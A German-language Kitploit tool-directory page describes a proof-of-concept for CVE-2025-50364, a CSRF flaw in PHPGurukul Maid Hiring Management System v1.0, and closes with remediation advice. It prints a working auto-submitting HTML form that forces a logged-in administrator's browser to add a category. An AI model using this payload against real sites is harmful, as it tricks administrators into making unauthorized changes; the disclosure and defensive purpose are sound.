Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — Proof-of-Concept-CSRF-Exploit, der auf CVE-2025-50364 im PHPGurukul Maid Hiring Management System v1.0 abzielt und über ein präpariertes HTML-Formular beliebige Admin-Kategorien hinzufügt. | Kitploit
Tools/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

Proof-of-Concept-CSRF-Exploit, der auf CVE-2025-50364 im PHPGurukul Maid Hiring Management System v1.0 abzielt und über ein präpariertes HTML-Formular beliebige Admin-Kategorien hinzufügt.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Projektname & Repo-URL: Maid Hiring Management System using PHP and MySQL

Schwachstellentyp: Client-Seitige Request-Fälschung

Betroffene Version(en): v1.0

💣Beschreibung der Schwachstelle: Eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) existiert im Admin-Panel des PHPGurukul Hiring Management Systems, die es einem Angreifer ermöglicht, beliebige Einstellungskategorien hinzuzufügen, indem ein authentifizierter Administrator dazu gebracht wird, eine bösartige Website zu besuchen. Dies kann zu Datenverschmutzung und unbefugten Änderungen auf Administratorebene führen.

👩‍💻Auswirkungen: Unbefugte Kategorieerstellung

🛜Proof-of-Concept (PoC)

  1. Es gab eine Kategoriehinzufügefunktion, bei der nur authentifizierte Administratoren eine Kategorie hinzufügen konnten. 1 2)HTML-Code, um eine POST-Anfrage an den Endpunkt /admin/add-category.php zu senden CSRF-POC 2
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Verwenden Sie den HTML-Code und erstellen Sie eine bösartige URL. 3
  2. Nachdem der Administrator auf den Link klickt, wird eine neue Kategorie hinzugefügt. 4 5

Empfehlung: Implementierung von CSRF-Tokens in Admin-Formularen, Durchsetzung von SameSite-Cookies und Validierung des Anfrageursprungs, um unbefugte Aktionen zu verhindern.

Tool herunterladen